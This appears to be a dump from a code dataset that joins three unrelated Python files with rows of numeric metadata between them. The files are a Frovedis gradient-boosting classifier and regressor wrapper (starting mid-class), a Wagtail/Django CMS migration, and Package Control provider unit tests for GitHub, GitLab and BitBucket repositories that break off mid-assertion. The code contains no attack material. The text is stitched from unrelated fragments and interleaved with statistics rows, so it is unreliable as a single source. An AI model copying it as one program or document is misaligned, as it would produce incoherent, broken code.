self.subsample = subsample
self.criterion = criterion
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_depth = max_depth
self.min_impurity_decrease = min_impurity_decrease # min_info_gain
self.min_impurity_split = min_impurity_split
self.init = init
self.random_state = random_state
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
self.warm_start = warm_start
self.presort = presort
self.validation_fraction = validation_fraction
self.n_iter_no_change = n_iter_no_change
self.tol = tol
self.ccp_alpha = ccp_alpha
self.verbose = verbose
# extra
self.__mid = None
self.__mdtype = None
self.__mkind = M_KIND.GBT
self.label_map = None
self.n_classes_ = None
# Frovedis side parameters
self.max_bins = max_bins
self.algo = "Classification"
def validate(self):
"""
NAME: validate
validating the params, if invalid raise ValueError
"""
supported_losses = ("deviance", "default")
supported_impurities = ("friedman_mse", "mae", "mse")
if self.loss not in supported_losses:
raise ValueError("Loss '{0:s}' not supported. ".format(self.loss))
if self.learning_rate <= 0.0:
raise ValueError("learning_rate must be greater than 0 but "
"was %r" % self.learning_rate)
if self.n_estimators <= 0:
raise ValueError("n_estimators must be greater than 0 but "
"was %r" % self.n_estimators)
if not (0.0 < self.subsample <= 1.0):
raise ValueError("subsample must be in (0,1] but "
"was %r" % self.subsample)
if self.criterion not in supported_impurities:
raise ValueError("Invalid criterion for GradientBoostingClassifier:"
+ "'{}'".format(self.criterion))
if self.max_depth < 0:
raise ValueError("max depth can not be negative !")
if self.min_impurity_decrease < 0:
raise ValueError("Value of min_impurity_decrease should be "
"greater than 0")
if self.max_bins < 0:
raise ValueError("Value of max_bin should be greater than 0")
if self.random_state is None:
self.random_state = -1
if(isinstance(self.max_features, int)):
self.feature_subset_strategy = "customrate"
self.feature_subset_rate = (self.max_features*1.0)/self.n_features_
elif(isinstance(self.max_features, float)):
self.feature_subset_strategy = "customrate"
self.feature_subset_rate = self.max_features
elif(self.max_features is None):
self.feature_subset_strategy = "all"
self.feature_subset_rate = self.n_features_
elif(self.max_features == "auto"):
self.feature_subset_strategy = "auto"
self.feature_subset_rate = np.sqrt(self.n_features_)
elif(self.max_features == "sqrt"):
self.feature_subset_strategy = "sqrt"
self.feature_subset_rate = np.sqrt(self.n_features_)
elif(self.max_features == "log2"):
self.feature_subset_strategy = "log2"
self.feature_subset_rate = np.log2(self.n_features_)
else:
raise ValueError("validate: unsupported max_features is encountered!")
# mapping frovedis loss types with sklearn
self.loss_map = {"deviance": "logloss", "exponential": "exponential",
"default": "default"}
@set_association
def fit(self, X, y):
"""
fits for Gradient Boost Classifier
"""
self.release()
# perform the fit
inp_data = FrovedisLabeledPoint(X, y, \
caller = "[" + self.__class__.__name__ + "] fit: ",\
encode_label = True, binary_encoder=[-1, 1], \
dense_kind = 'colmajor', densify=True)
X, y, logic = inp_data.get()
self._classes = inp_data.get_distinct_labels()
self.n_classes_ = len(self._classes)
self.n_samples_ = inp_data.numRows()
self.n_features_ = inp_data.numCols()
self.label_map = logic
dtype = inp_data.get_dtype()
itype = inp_data.get_itype()
dense = inp_data.is_dense()
self.n_estimators_ = self.n_estimators # TODO: confirm whether frovedis supports n_iter_no_change
self.validate()
self.__mdtype = dtype
self.__mid = ModelID.get()
(host, port) = FrovedisServer.getServerInstance()
rpclib.gbt_train(host, port, X.get(), y.get(),
self.algo.encode('ascii'),
self.loss_map[self.loss].encode('ascii'),
self.criterion.lower().encode('ascii'),
self.learning_rate, # double
self.max_depth, # int
self.min_impurity_decrease, # double
self.random_state, # int seed
self.tol, # double,
self.max_bins, # int
self.subsample, # double
self.feature_subset_strategy.encode('ascii'),
self.feature_subset_rate,
self.n_estimators, self.n_classes_,
self.verbose, self.__mid,
dtype, itype, dense)
excpt = rpclib.check_server_exception()
if excpt["status"]:
raise RuntimeError(excpt["info"])
return self
@check_association
def predict(self, X):
"""
performs classification on an array of test vectors X.
"""
frov_pred = GLM.predict(X, self.__mid, self.__mkind, self.__mdtype, \
False)
return np.asarray([self.label_map[frov_pred[i]] \
for i in range(0, len(frov_pred))])
@property
def classes_(self):
"""classes_ getter"""
if not self.is_fitted():
raise AttributeError("attribute 'classes_' \
might have been released or called before fit")
if self._classes is None:
self._classes = np.sort(list(self.label_map.values()))
return self._classes
@classes_.setter
def classes_(self, val):
"""classes_ setter"""
raise AttributeError(\
"attribute 'classes_' of GradientBoostingClassifier "
"object is not writable")
@set_association
def load(self, fname, dtype=None):
"""
NAME: load
Load the model from a file
"""
if not os.path.exists(fname):
raise ValueError("the model with name %s does not exist!" % fname)
self.release()
target = open(fname + "/label_map", "rb")
self.label_map = pickle.load(target)
target.close()
self._classes = np.sort(list(self.label_map.values()))
metadata = open(fname + "/metadata", "rb")
self.n_classes_, self.__mkind, self.__mdtype = pickle.load(metadata)
metadata.close()
if dtype is not None:
mdt = TypeUtil.to_numpy_dtype(self.__mdtype)
if dtype != mdt:
raise ValueError("load: type mismatches detected! " +
"expected type: " + str(mdt) +
"; given type: " + str(dtype))
self.__mid = ModelID.get()
GLM.load(self.__mid, self.__mkind, self.__mdtype, fname + "/model")
return self
def score(self, X, y, sample_weight=None):
"""
check the accuracy for the model
"""
return accuracy_score(y, self.predict(X), sample_weight=sample_weight)
@check_association
def save(self, fname):
"""
saves the model to a file
"""
if os.path.exists(fname):
raise ValueError("another model with %s name already"
" exists!" % fname)
else:
os.makedirs(fname)
GLM.save(self.__mid, self.__mkind, self.__mdtype, fname + "/model")
target = open(fname + "/label_map", "wb")
pickle.dump(self.label_map, target)
target.close()
metadata = open(fname + "/metadata", "wb")
pickle.dump((self.n_classes_, self.__mkind,
self.__mdtype), metadata)
metadata.close()
@check_association
def debug_print(self):
"""
shows the model
"""
GLM.debug_print(self.__mid, self.__mkind, self.__mdtype)
def release(self):
"""
resets after-fit populated attributes to None
"""
self.__release_server_heap()
self.__mid = None
self.__mdtype = None
self._classes = None
self.label_map = None
self.n_classes_ = None
self.n_samples_ = self.n_features_ = None
@do_if_active_association
def __release_server_heap(self):
"""
to release model pointer from server heap
"""
GLM.release(self.__mid, self.__mkind, self.__mdtype)
def __del__(self):
"""
NAME: __del__
"""
self.release()
def is_fitted(self):
""" function to confirm if the model is already fitted """
return self.__mid is not None
class GradientBoostingRegressor(BaseEstimator):
"""A python wrapper of Frovedis Gradient boosted trees: regressor"""
def __init__(self, loss='ls', learning_rate=0.1, n_estimators=100,
subsample=1.0, criterion='friedman_mse', min_samples_split=2,
min_samples_leaf=1, min_weight_fraction_leaf=0.,
max_depth=3, min_impurity_decrease=0.,
min_impurity_split=None, init=None, random_state=None,
max_features=None, alpha=0.9, verbose=0, max_leaf_nodes=None,
warm_start=False, presort='deprecated',
validation_fraction=0.1,
n_iter_no_change=None, tol=1e-4, ccp_alpha=0.0,
max_bins=32):
self.loss = loss
self.learning_rate = learning_rate
self.n_estimators = n_estimators
self.subsample = subsample
self.criterion = criterion
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_depth = max_depth
self.min_impurity_decrease = min_impurity_decrease # min_info_gain
self.min_impurity_split = min_impurity_split
self.init = init
self.random_state = random_state
self.max_features = max_features
self.alpha = alpha
self.max_leaf_nodes = max_leaf_nodes
self.warm_start = warm_start
self.presort = presort
self.validation_fraction = validation_fraction
self.n_iter_no_change = n_iter_no_change
self.tol = tol
self.ccp_alpha = ccp_alpha
self.verbose = verbose
# extra
self.__mid = None
self.__mdtype = None
self.__mkind = M_KIND.GBT
self.max_bins = max_bins
self.algo = "Regression"
def validate(self):
"""
NAME: validate
validating the params, if invalid raise ValueError
"""
supported_losses = ("ls", "lad", "default")
supported_impurities = ("friedman_mse", "mae", "mse")
if self.loss not in supported_losses:
raise ValueError("Loss '{0:s}' not supported. ".format(self.loss))
if self.learning_rate <= 0.0:
raise ValueError("learning_rate must be greater than 0 but "
"was %r" % self.learning_rate)
if self.n_estimators <= 0:
raise ValueError("n_estimators must be greater than 0 but "
"was %r" % self.n_estimators)
if not (0.0 < self.subsample <= 1.0):
raise ValueError("subsample must be in (0,1] but "
"was %r" % self.subsample)
if self.criterion not in supported_impurities:
raise ValueError("Invalid criterion for GradientBoostingClassifier:"
+ "'{}'".format(self.criterion))
if self.max_depth < 0:
raise ValueError("max depth can not be negative !")
if self.min_impurity_decrease < 0:
raise ValueError("Value of min_impurity_decrease should be "
"greater than 0")
if self.max_bins < 0:
raise ValueError("Value of max_bin should be greater than 0")
if self.random_state is None:
self.random_state = -1
if(isinstance(self.max_features, int)):
self.feature_subset_strategy = "customrate"
self.feature_subset_rate = (self.max_features*1.0)/self.n_features_
elif(isinstance(self.max_features, float)):
self.feature_subset_strategy = "customrate"
self.feature_subset_rate = self.max_features
elif(self.max_features is None):
self.feature_subset_strategy = "all"
self.feature_subset_rate = self.n_features_
elif(self.max_features == "auto"):
self.feature_subset_strategy = "auto"
self.feature_subset_rate = np.sqrt(self.n_features_)
elif(self.max_features == "sqrt"):
self.feature_subset_strategy = "sqrt"
self.feature_subset_rate = np.sqrt(self.n_features_)
elif(self.max_features == "log2"):
self.feature_subset_strategy = "log2"
self.feature_subset_rate = np.log2(self.n_features_)
else:
raise ValueError("validate: unsupported max_features is encountered!")
# mapping frovedis loss types with sklearn
self.loss_map = {"ls": "leastsquareserror", "lad": "leastabsoluteerror",
"default": "default"}
@set_association
def fit(self, X, y):
"""
fit for Gradient Boost Classifier
"""
# release old model, if any
self.release()
inp_data = FrovedisLabeledPoint(X, y, \
caller = "[" + self.__class__.__name__ + "] fit: ",\
dense_kind = 'colmajor', densify=True)
(X, y) = inp_data.get()
dtype = inp_data.get_dtype()
itype = inp_data.get_itype()
dense = inp_data.is_dense()
self.n_estimators_ = self.n_estimators # TODO: confirm whether frovedis supports n_iter_no_change
self.n_samples_ = inp_data.numRows()
self.n_features_ = inp_data.numCols()
self.validate()
self.__mdtype = dtype
self.__mid = ModelID.get()
(host, port) = FrovedisServer.getServerInstance()
rpclib.gbt_train(host, port, X.get(), y.get(),
self.algo.encode('ascii'),
self.loss_map[self.loss].encode('ascii'),
self.criterion.lower().encode('ascii'),
self.learning_rate, # double
self.max_depth, # int
self.min_impurity_decrease, # double
self.random_state, # int seed
self.tol, # double,
self.max_bins, # int
self.subsample, # double
self.feature_subset_strategy.encode('ascii'),
self.feature_subset_rate,
self.n_estimators, -1, # -1 for n_classes , as regressor
self.verbose, self.__mid,
dtype, itype, dense)
excpt = rpclib.check_server_exception()
if excpt["status"]:
raise RuntimeError(excpt["info"])
return self
@check_association
def predict(self, X):
"""
performs prediction on an array of test vectors X.
"""
frov_pred = GLM.predict(X, self.__mid, self.__mkind, self.__mdtype, \
False)
return np.asarray(frov_pred, dtype = np.float64)
@set_association
def load(self, fname, dtype=None):
"""
loads the model from a file
"""
if not os.path.exists(fname):
raise ValueError("the model with name %s does not exist!" % fname)
self.release()
metadata = open(fname + "/metadata", "rb")
self.__mkind, self.__mdtype = pickle.load(metadata)
metadata.close()
if dtype is not None:
mdt = TypeUtil.to_numpy_dtype(self.__mdtype)
if dtype != mdt:
raise ValueError("load: type mismatches detected! " +
"expected type: " + str(mdt) +
"; given type: " + str(dtype))
self.__mid = ModelID.get()
GLM.load(self.__mid, self.__mkind, self.__mdtype, fname + "/model")
return self
def score(self, X, y, sample_weight=None):
"""
check the r2 score for the model
"""
return r2_score(y, self.predict(X), sample_weight=sample_weight)
@check_association
def save(self, fname):
"""
saves model to a file
"""
if os.path.exists(fname):
raise ValueError("another model with %s name already"
" exists!" % fname)
else:
os.makedirs(fname)
GLM.save(self.__mid, self.__mkind, self.__mdtype, fname + "/model")
metadata = open(fname + "/metadata", "wb")
pickle.dump((self.__mkind,
self.__mdtype), metadata)
metadata.close()
@check_association
def debug_print(self):
"""
shows the model
"""
GLM.debug_print(self.__mid, self.__mkind, self.__mdtype)
def release(self):
"""
resets after-fit populated attributes to None
"""
self.__release_server_heap()
self.__mid = None
self.__mdtype = None
self.n_samples_ = self.n_features_ = None
@do_if_active_association
def __release_server_heap(self):
"""
to release model pointer from server heap
"""
GLM.release(self.__mid, self.__mkind, self.__mdtype)
def __del__(self):
"""
NAME: __del__
"""
self.release()
def is_fitted(self):
""" function to confirm if the model is already fitted """
return self.__mid is not None
| 38.60381 | 105 | 0.575862 | 2,292 | 20,267 | 4.815009 | 0.126091 | 0.017216 | 0.043132 | 0.031714 | 0.868159 | 0.863538 | 0.858644 | 0.847046 | 0.827836 | 0.80319 | 0 | 0.007336 | 0.327379 | 20,267 | 524 | 106 | 38.677481 | 0.80223 | 0.073321 | 0 | 0.828645 | 0 | 0 | 0.091243 | 0.006694 | 0 | 0 | 0 | 0.003817 | 0 | 1 | 0.066496 | false | 0 | 0.025575 | 0 | 0.12532 | 0.01023 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
58b10649e3f14478d512153af38aa8ac5174b86b | 4,593 | py | Python | app/portal/cms/migrations/0010_auto_20210617_2303.py | Ecotrust/OH4S_Proteins | 52ad588ef071064abc5c3f43aa125ad97bff26c4 | [
"Apache-2.0"
] | null | null | null | app/portal/cms/migrations/0010_auto_20210617_2303.py | Ecotrust/OH4S_Proteins | 52ad588ef071064abc5c3f43aa125ad97bff26c4 | [
"Apache-2.0"
] | 185 | 2019-01-23T21:05:15.000Z | 2021-07-01T01:29:14.000Z | app/portal/cms/migrations/0010_auto_20210617_2303.py | Ecotrust/OH4S_Proteins | 52ad588ef071064abc5c3f43aa125ad97bff26c4 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.2 on 2021-06-17 23:03
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('cms', '0009_auto_20210615_1823'),
]
operations = [
migrations.AddField(
model_name='producerpage',
name='bottom_blurb',
field=wagtail.core.fields.StreamField([('image', wagtail.images.blocks.ImageChooserBlock()), ('text', wagtail.core.blocks.RichTextBlock(blank=True, features=['h2', 'h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'hr', 'superscript', 'subscript', 'strikethrough', 'blockquote', 'image', 'embed', 'code'])), ('google_form', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], help_text='The URL for the Google form. This will be loaded into a popup when clicked.', label='Google Form Link', template='cms/google_form.html')), ('HTML', wagtail.core.blocks.RawHTMLBlock(help_text='For fine-tuning very specific/custom blocks.', label='Custom HTML')), ('Embedded_Media', wagtail.embeds.blocks.EmbedBlock(label='Embedded Media'))], blank=True),
),
migrations.AlterField(
model_name='footerpage',
name='column_1',
field=wagtail.core.fields.StreamField([('image', wagtail.images.blocks.ImageChooserBlock()), ('externalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], label='External Link', template='cms/external_link.html')), ('internalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.PageChooserBlock())], label='Internal Link', template='cms/internal_link.html')), ('google_form', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], help_text='The URL for the Google form. This will be loaded into a popup when clicked.', label='Google Form Link', template='cms/google_form_footer.html')), ('text', wagtail.core.blocks.RichTextBlock(features=['h2', 'h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'hr', 'superscript', 'subscript', 'strikethrough', 'blockquote', 'image', 'embed', 'code']))]),
),
migrations.AlterField(
model_name='footerpage',
name='column_2',
field=wagtail.core.fields.StreamField([('image', wagtail.images.blocks.ImageChooserBlock()), ('externalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], label='External Link', template='cms/external_link.html')), ('internalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.PageChooserBlock())], label='Internal Link', template='cms/internal_link.html')), ('google_form', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], help_text='The URL for the Google form. This will be loaded into a popup when clicked.', label='Google Form Link', template='cms/google_form_footer.html')), ('text', wagtail.core.blocks.RichTextBlock(features=['h2', 'h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'hr', 'superscript', 'subscript', 'strikethrough', 'blockquote', 'image', 'embed', 'code']))]),
),
migrations.AlterField(
model_name='footerpage',
name='column_3',
field=wagtail.core.fields.StreamField([('image', wagtail.images.blocks.ImageChooserBlock()), ('externalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], label='External Link', template='cms/external_link.html')), ('internalLink', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.PageChooserBlock())], label='Internal Link', template='cms/internal_link.html')), ('google_form', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock()), ('link', wagtail.core.blocks.URLBlock())], help_text='The URL for the Google form. This will be loaded into a popup when clicked.', label='Google Form Link', template='cms/google_form_footer.html')), ('text', wagtail.core.blocks.RichTextBlock(features=['h2', 'h3', 'h4', 'bold', 'italic', 'link', 'ol', 'ul', 'hr', 'superscript', 'subscript', 'strikethrough', 'blockquote', 'image', 'embed', 'code']))]),
),
]
| 120.868421 | 1,001 | 0.690616 | 542 | 4,593 | 5.789668 | 0.184502 | 0.143722 | 0.195029 | 0.09369 | 0.851179 | 0.840344 | 0.840344 | 0.824729 | 0.824729 | 0.824729 | 0 | 0.011043 | 0.11278 | 4,593 | 37 | 1,002 | 124.135135 | 0.759018 | 0.009362 | 0 | 0.419355 | 1 | 0 | 0.314424 | 0.051891 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.16129 | 0 | 0.258065 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
58b629e603912f69b1704f6756f343d38a500221 | 103,635 | py | Python | package_control/tests/providers.py | kimiscool-star/package_control | 8b947d227bfee2b514283e650c3f88c954ae1026 | [
"Unlicense",
"MIT"
] | 1 | 2020-07-20T07:34:44.000Z | 2020-07-20T07:34:44.000Z | package_control/tests/providers.py | kimiscool-star/package_control | 8b947d227bfee2b514283e650c3f88c954ae1026 | [
"Unlicense",
"MIT"
] | null | null | null | package_control/tests/providers.py | kimiscool-star/package_control | 8b947d227bfee2b514283e650c3f88c954ae1026 | [
"Unlicense",
"MIT"
] | 6 | 2020-07-24T05:46:33.000Z | 2021-05-31T13:09:33.000Z | import unittest
from ..providers.repository_provider import RepositoryProvider
from ..providers.channel_provider import ChannelProvider
from ..providers.github_repository_provider import GitHubRepositoryProvider
from ..providers.github_user_provider import GitHubUserProvider
from ..providers.gitlab_repository_provider import GitLabRepositoryProvider
from ..providers.gitlab_user_provider import GitLabUserProvider
from ..providers.bitbucket_repository_provider import BitBucketRepositoryProvider
from ..http_cache import HttpCache
from . import LAST_COMMIT_TIMESTAMP, LAST_COMMIT_VERSION, CLIENT_ID, CLIENT_SECRET
class GitHubRepositoryProviderTests(unittest.TestCase):
maxDiff = None
def github_settings(self):
return {
'debug': True,
'cache': HttpCache(604800),
'query_string_params': {
'api.github.com': {
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
}
}
}
def test_match_url(self):
self.assertEqual(
True,
GitHubRepositoryProvider.match_url('https://github.com/packagecontrol-test/package_control-tester')
)
self.assertEqual(
True,
GitHubRepositoryProvider.match_url(
'https://github.com/packagecontrol-test/package_control-tester/tree/master'
)
)
self.assertEqual(
False,
GitHubRepositoryProvider.match_url('https://github.com/packagecontrol-test')
)
def test_get_packages(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester',
{
'name': 'package_control-tester',
'description': 'A test of Package Control upgrade messages with '
'explicit versions, but date-based releases.',
'homepage': 'https://github.com/packagecontrol-test/package_control-tester',
'author': 'packagecontrol-test',
'readme': 'https://raw.githubusercontent.com/packagecontrol-test'
'/package_control-tester/master/readme.md',
'issues': 'https://github.com/packagecontrol-test/package_control-tester/issues',
'donate': None,
'buy': None,
'sources': ['https://github.com/packagecontrol-test/package_control-tester'],
'labels': [],
'previous_names': [],
'releases': [
{
'date': LAST_COMMIT_TIMESTAMP,
'version': LAST_COMMIT_VERSION,
'url': 'https://codeload.github.com/packagecontrol-test'
'/package_control-tester/zip/master',
'sublime_text': '*',
'platforms': ['*']
}
],
'last_modified': LAST_COMMIT_TIMESTAMP
}
)],
packages
)
def test_get_sources(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
self.assertEqual(
['https://github.com/packagecontrol-test/package_control-tester'],
provider.get_sources()
)
def test_get_renamed_packages(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
self.assertEqual({}, provider.get_renamed_packages())
def test_get_broken_packages(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
self.assertEqual(list(), list(provider.get_broken_packages()))
def test_get_dependencies(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
self.assertEqual(list(), list(provider.get_dependencies()))
def test_get_broken_dependencies(self):
provider = GitHubRepositoryProvider(
'https://github.com/packagecontrol-test/package_control-tester',
self.github_settings()
)
self.assertEqual(list(), list(provider.get_broken_dependencies()))
class GitHubUserProviderTests(unittest.TestCase):
maxDiff = None
def github_settings(self):
return {
'debug': True,
'cache': HttpCache(604800),
'query_string_params': {
'api.github.com': {
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
}
}
}
def test_match_url(self):
self.assertEqual(
True,
GitHubUserProvider.match_url('https://github.com/packagecontrol-test')
)
self.assertEqual(
False,
GitHubUserProvider.match_url(
'https://github.com/packagecontrol-test/package_control-tester/tree/master'
)
)
self.assertEqual(
False,
GitHubUserProvider.match_url('https://bitbucket.org/packagecontrol')
)
def test_get_packages(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester',
{
'name': 'package_control-tester',
'description': 'A test of Package Control upgrade messages with '
'explicit versions, but date-based releases.',
'homepage': 'https://github.com/packagecontrol-test/package_control-tester',
'author': 'packagecontrol-test',
'readme': 'https://raw.githubusercontent.com/packagecontrol-test'
'/package_control-tester/master/readme.md',
'issues': 'https://github.com/packagecontrol-test/package_control-tester/issues',
'donate': None,
'buy': None,
'sources': ['https://github.com/packagecontrol-test'],
'labels': [],
'previous_names': [],
'releases': [
{
'date': LAST_COMMIT_TIMESTAMP,
'version': LAST_COMMIT_VERSION,
'url': 'https://codeload.github.com/packagecontrol-test'
'/package_control-tester/zip/master',
'sublime_text': '*',
'platforms': ['*']
}
],
'last_modified': LAST_COMMIT_TIMESTAMP
}
)],
packages
)
def test_get_sources(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
self.assertEqual(['https://github.com/packagecontrol-test'], provider.get_sources())
def test_get_renamed_packages(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
self.assertEqual({}, provider.get_renamed_packages())
def test_get_broken_packages(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
self.assertEqual(list(), list(provider.get_broken_packages()))
def test_get_dependencies(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
self.assertEqual(list(), list(provider.get_dependencies()))
def test_get_broken_dependencies(self):
provider = GitHubUserProvider('https://github.com/packagecontrol-test', self.github_settings())
self.assertEqual(list(), list(provider.get_broken_dependencies()))
class GitLabRepositoryProviderTests(unittest.TestCase):
maxDiff = None
def gitlab_settings(self):
return {
'debug': True,
'cache': HttpCache(604800),
}
def test_match_url(self):
self.assertEqual(
True,
GitLabRepositoryProvider.match_url('https://gitlab.com/packagecontrol-test/package_control-tester')
)
self.assertEqual(
True,
GitLabRepositoryProvider.match_url(
'https://gitlab.com/packagecontrol-test/package_control-tester/-/tree/master'
)
)
self.assertEqual(
False,
GitLabRepositoryProvider.match_url('https://gitlab.com/packagecontrol-test')
)
def test_get_packages(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester',
{
'name': 'package_control-tester',
'description': 'A test of Package Control upgrade messages with '
'explicit versions, but date-based releases.',
'homepage': 'https://gitlab.com/packagecontrol-test/package_control-tester',
'author': 'packagecontrol-test',
'readme': 'https://gitlab.com/packagecontrol-test/'
'package_control-tester/-/master/readme.md',
'issues': None,
'donate': None,
'buy': None,
'sources': ['https://gitlab.com/packagecontrol-test/package_control-tester'],
'labels': [],
'previous_names': [],
'releases': [
{
'date': '2020-07-15 10:50:38',
'version': '2020.07.15.10.50.38',
'url': 'https://gitlab.com/packagecontrol-test/'
'package_control-tester/-/archive/master/'
'package_control-tester-master.zip',
'sublime_text': '*',
'platforms': ['*']
}
],
'last_modified': '2020-07-15 10:50:38'
}
)],
packages
)
def test_get_sources(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
self.assertEqual(
['https://gitlab.com/packagecontrol-test/package_control-tester'],
provider.get_sources()
)
def test_get_renamed_packages(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
self.assertEqual({}, provider.get_renamed_packages())
def test_get_broken_packages(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
self.assertEqual(list(), list(provider.get_broken_packages()))
def test_get_dependencies(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
self.assertEqual(list(), list(provider.get_dependencies()))
def test_get_broken_dependencies(self):
provider = GitLabRepositoryProvider(
'https://gitlab.com/packagecontrol-test/package_control-tester',
self.gitlab_settings()
)
self.assertEqual(list(), list(provider.get_broken_dependencies()))
class GitLabUserProviderTests(unittest.TestCase):
maxDiff = None
def gitlab_settings(self):
return {
'debug': True,
'cache': HttpCache(604800),
}
def test_match_url(self):
self.assertEqual(
True,
GitLabUserProvider.match_url('https://gitlab.com/packagecontrol-test')
)
self.assertEqual(
False,
GitLabUserProvider.match_url(
'https://github.com/packagecontrol-test/package_control-tester/tree/master'
)
)
self.assertEqual(
False,
GitLabUserProvider.match_url('https://bitbucket.org/packagecontrol')
)
def test_get_packages(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester',
{
'name': 'package_control-tester',
'description': 'A test of Package Control upgrade messages with '
'explicit versions, but date-based releases.',
'homepage': 'https://gitlab.com/packagecontrol-test/package_control-tester',
'author': 'packagecontrol-test',
'readme': 'https://gitlab.com/packagecontrol-test/'
'package_control-tester/-/raw/master/readme.md',
'issues': None,
'donate': None,
'buy': None,
'sources': ['https://gitlab.com/packagecontrol-test'],
'labels': [],
'previous_names': [],
'releases': [{
'sublime_text': '*',
'date': '2020-07-15 10:50:38',
'version': '2020.07.15.10.50.38',
'platforms': ['*'],
'url': 'https://gitlab.com/packagecontrol-test/'
'package_control-tester/-/archive/master/package_control-tester-master.zip'
}],
'last_modified': '2020-07-15 10:50:38'
}
)],
packages
)
def test_get_sources(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
self.assertEqual(['https://gitlab.com/packagecontrol-test'], provider.get_sources())
def test_get_renamed_packages(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
self.assertEqual({}, provider.get_renamed_packages())
def test_get_broken_packages(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
self.assertEqual(list(), list(provider.get_broken_packages()))
def test_get_dependencies(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
self.assertEqual(list(), list(provider.get_dependencies()))
def test_get_broken_dependencies(self):
provider = GitLabUserProvider('https://gitlab.com/packagecontrol-test', self.gitlab_settings())
self.assertEqual(list(), list(provider.get_broken_dependencies()))
class BitBucketRepositoryProviderTests(unittest.TestCase):
maxDiff = None
def bitbucket_settings(self):
return {
'debug': True,
'cache': HttpCache(604800)
}
def test_match_url(self):
self.assertEqual(
True,
BitBucketRepositoryProvider.match_url('https://bitbucket.org/wbond/package_control-tester')
)
self.assertEqual(
False,
BitBucketRepositoryProvider.match_url('https://bitbucket.org/wbond')
)
self.assertEqual(
False,
BitBucketRepositoryProvider.match_url('https://github.com/wbond/package_control-tester')
)
def test_get_packages(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
